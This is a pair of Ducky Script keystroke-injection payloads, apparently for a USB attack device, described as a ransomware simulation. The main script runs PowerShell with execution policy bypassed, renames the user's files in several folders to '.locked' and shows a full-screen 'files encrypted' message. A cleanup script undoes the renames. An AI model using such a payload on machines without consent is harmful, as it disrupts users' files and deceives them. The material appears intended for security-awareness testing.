# Main
REM This script was created by github.com/MarkCyber
REM This script is intended to act as a simulation of a ransomware attack
REM This script will change all file extensions to .locked rather than encrypting the files
REM This script will also display a simulated encrypted message

DELAY 1000
GUI r
DELAY 1000
STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "
$locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music');
$errorOccurred = $false;
foreach ($loc in $locations) {
    $path = [Environment]::GetFolderPath($loc);
    $files = Get-ChildItem -Path $path -File;
    foreach ($file in $files) {
        try {
            Rename-Item -Path $file.FullName -NewName ($file.Name + '.locked');
        } catch {
            $errorOccurred = $true;
        }
    }
}
if ($errorOccurred) {
    Write-Host 'An error occurred while renaming files';
}
Add-Type -AssemblyName PresentationFramework;
$Window = New-Object System.Windows.Window;
$Window.WindowStartupLocation = 'CenterScreen';
$Window.WindowState = 'Maximized';
$Window.Topmost = $true;
$Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.';
$Window.ShowDialog();
"
ENTER
DELAY 1000

STRING exit
ENTER







# Cleanup
REM This script was created by github.com/MarkCyber
REM This is a follow-up script to the RansomwareSimulation
REM This script is to revert all changes from the RansomwareSimulation script

DELAY 1000
GUI r
DELAY 2000
STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "
$locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music');
foreach ($loc in $locations) {
    $path = [Environment]::GetFolderPath($loc);
    $files = Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') };
    foreach ($file in $files) {
        Rename-Item -Path $file.FullName -NewName ($file.Name -replace '\.locked$', '');
    }
}
"
ENTER
DELAY 1000

STRING exit
ENTER